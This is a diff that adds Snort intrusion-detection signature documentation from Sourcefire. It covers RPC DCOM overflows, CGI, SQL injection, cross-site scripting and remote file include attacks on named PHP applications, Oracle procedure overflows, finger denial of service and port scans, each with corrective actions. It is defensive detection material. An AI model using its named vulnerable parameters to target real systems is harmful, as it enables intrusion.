+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3395.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3395
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2176.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2176
+
+
+--
+Summary:
+This event is generated when an attempt is made to access a system
+folder via SMB. 
+
+--
+Impact:
+Serious. This folder contains important operating system information.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to access a folder
+containing important operating system files using SMB across the
+network.
+
+--
+Affected Systems:
+Microsoft Windows systems.
+
+--
+Attack Scenarios:
+If this folder is accessible via SMB the attacker can replace or view
+important operating system files.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/456.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+456
+
+--
+Summary:
+This event is generated when an attempt is made to use ICMP as a
+reconnaisance tool.
+
+--
+Impact:
+Can be used as a reconnaissance tool.  Traceroute reveals information
+about the layout of a network.
+
+--
+Detailed Information:
+There are at least three different implementations of traceroute.  In
+one implementation traceroute works by sending an ICMP Echo Request
+packet to a destination host with a TTL value of 1.  If the host is more
+than one hop away, the first route that receives the back will send back
+an ICMP packet indicating that the TTL was exceeded.  The address of
+this router is then listed as the first hop.  The packet is then sent
+out again with a TTL of 2.  This continues until the destination host is
+able to reply or some maximum TTL value is reached.
+
+The other two implementations use the same TTL-based concept with an
+ICMP type of 30(traceroute) or with an UDP packet destined for an
+ephemeral port.
+
+--
+Affected Systems:
+All
+
+--
+Attack Scenarios:
+
+Traceroute is often used against machines on a network prior to an
+attack.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Block inbound ICMP type 30 messages.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  by Steven Alexander<alexander.s@mccd.edu>
+
+--
+Additional References:
+
+Miscellaneous
+http://www.faqs.org/rfcs/rfc1393.html
+
+
+
+
+
+--
--- /dev/null
+++ b/doc/signatures/1554.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1554
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000160.txt
@@ -0,0 +1,59 @@
+Rule: 
+
+--
+Sid: 
+100000160
+
+-- 
+Summary: 
+This event is generated when an abnormally larger number of packets are 
+received from a single source by an SIP-enabled host in a short period of time.
+
+--
+Impact:
+This can be an indication of a denial of service attack in progress.
+
+--
+Detailed Information:
+This rule is designed to detect overly large amounts of traffic coming from a 
+single host to the SIP port on an internal host, as it is possible to cause a 
+denial of service by sending a large number of packets with invalid data.
+
+--
+Affected Systems:
+Any which implement the SIP protocol.
+
+--
+Attack Scenarios:
+An attacker could use a script to flood a system with invalid messages, causing 
+a denial of service.
+
+--
+Ease of Attack:
+Simple, as it is trivial to write a script to generate random data.
+
+--
+False Positives:
+Known SIP proxies may receive a high volume of legitimate data, and NAT devices 
+may appear to be sending a larger amount of data than a regular host. It is 
+recommended that users whitelist known SIP proxies and NAT devices.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a firewall or other access-restriction device to block unwanted messages at 
+your network's border.
+
+--
+Contributors:
+Jiri Markl <jiri.markl@nextsoft.cz>
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/1517.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1517
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000521.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+100000521
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "TPL Design TplShop" application running on a webserver. 
+Access to the file "category.php" with SQL commands being passed as the 
+"first_row" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "first_row" parameter in the "category.php" script used 
+by the "TPL Design TplShop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using TPL Design TplShop
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/1541.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1541
+
+--
+Summary:
+This event is generated when an attempt is made to ascertain which 
+version of fingerd is running on a host. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to ascertain which 
+version of the finger daemon is running on a host. This may be the 
+prelude to an attack against that finger daemon.
+
+--
+Affected Systems:
+Any host running fingerd.
+
+--
+Attack Scenarios:
+An attacker can determine which version of fingerd is running then 
+attempt to exploit fingerd if it is found to be vulnerable to attack.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disallow access to fingerd from sources external to the protected 
+network.
+
+Disable the finger daemon.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+GNU Finger Manual:
+http://www.gnu.org/software/finger/manual/
+
+--
--- /dev/null
+++ b/doc/signatures/122-10.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-10
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically an ip decoy
+protocol scan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/2868.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2868
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_update_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000526.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000526
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "PHPMyDirectory" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "from" parameter in the "index.php" script used 
+by the "PHPMyDirectory" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPMyDirectory
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/110-2.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+110-2
+
+--
+Summary:
+This event is generated when the pre-processor spp_unidecode detects
+network traffic that may constitute an attack. Specifically a directory
+traversal was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_unidecode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3190.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3190
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2880.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2880
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_delete_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000790.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000790
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Pivot" application running on a webserver. Access to the file "edit_new.php" using a remote file being passed as the "Paths[extensions_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "Paths[extensions_path]" parameter in the "edit_new.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000529.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000529
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "NC Linklist" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "cat" parameter in the "index.php" script used 
+by the "NC Linklist" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using NC Linklist
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/941.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+941
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1532.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1532
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/328.txt
@@ -0,0 +1,62 @@
+Rule:   
+
+--
+Sid: 328
+
+-- 
+
+Summary: 
+This event is generated when a Denial-of-Service (DoS) attack against a finger daemon is attempted.
+
+-- 
+
+Impact: 
+The attacker may overload the target machine or crash the finger daemon
+
+--
+Detailed Information:
+This event is generated when a specially crafted finger query is directed at a target UNIX host. 
+
+The Finger daemon is used to provide information about users on a UNIX system. It used to be installed and enabled by default on most UNIX/Linux systems. The attack will crash or overload the vulnerable machines.
+
+--
+
+Attack Scenarios: 
+The attacker needs to send specially crafted packets to the finger daemon on a host.
+
+-- 
+
+Ease of Attack: 
+Moderate, no exploit software is required, just a specially formatted finger query
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the service via firewall or TCP wrappers.
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0106
+
+Arachnids:
+http://www.whitehats.com/info/IDS381
+
+--
--- /dev/null
+++ b/doc/signatures/100000652.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000652
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "id" parameter in the "index.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/618.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+618
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain which ports a host may be listening on, whether or not the ports are filtered by a firewall and if the host is vulnerable to a particular exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. Then the attacker might find out that the FTP service is vulnerable to a particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1783.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+
+1783
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "oral sex".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "oral sex".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
